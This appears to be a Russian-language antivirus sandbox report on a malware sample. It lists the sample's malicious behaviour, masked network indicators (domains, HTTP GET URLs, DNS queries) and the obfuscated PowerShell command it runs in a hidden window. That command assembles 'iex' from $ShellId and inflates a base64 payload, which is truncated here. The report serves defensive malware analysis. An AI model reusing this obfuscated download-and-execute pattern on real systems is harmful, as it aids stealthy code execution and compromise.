Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $sHellid[1]+$SHeLLId[13]+'x') (New-objECT SYsTEm.iO.STreaMrEADEr((New-objECT iO.COMPRessIon.deFLaTesTREAM( [io.MEMORyStREaM] [COnveRt]::FRoMBAsE64StrInG( 'VZBNa8JAEIb/Sg4Lq1h3S6FQXAJCbbUH...
Сетевая активность
Подключается к
- 'gu####ansfer.com':80
- 'fr####utasima.net':80
TCP
Запросы HTTP GET
- http://www.gu####ansfer.com/cGQPt/
- http://www.fr####utasima.net/m/
UDP
- DNS ASK gu####ansfer.com
- DNS ASK pr#####raktorista.ru
- DNS ASK no###ngame.tk
- DNS ASK fr####utasima.net
- DNS ASK ba###car.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $sHellid[1]+$SHeLLId[13]+'x') (New-objECT SYsTEm.iO.STreaMrEADEr((New-objECT iO.COMPRessIon.deFLaTesTREAM( [io.MEMORyStREaM] [COnveRt]::FRoMBAsE64StrInG( 'VZBNa8JAEIb/Sg4Lq1h3S6FQXAJCbbUH...' (со скрытым окном)
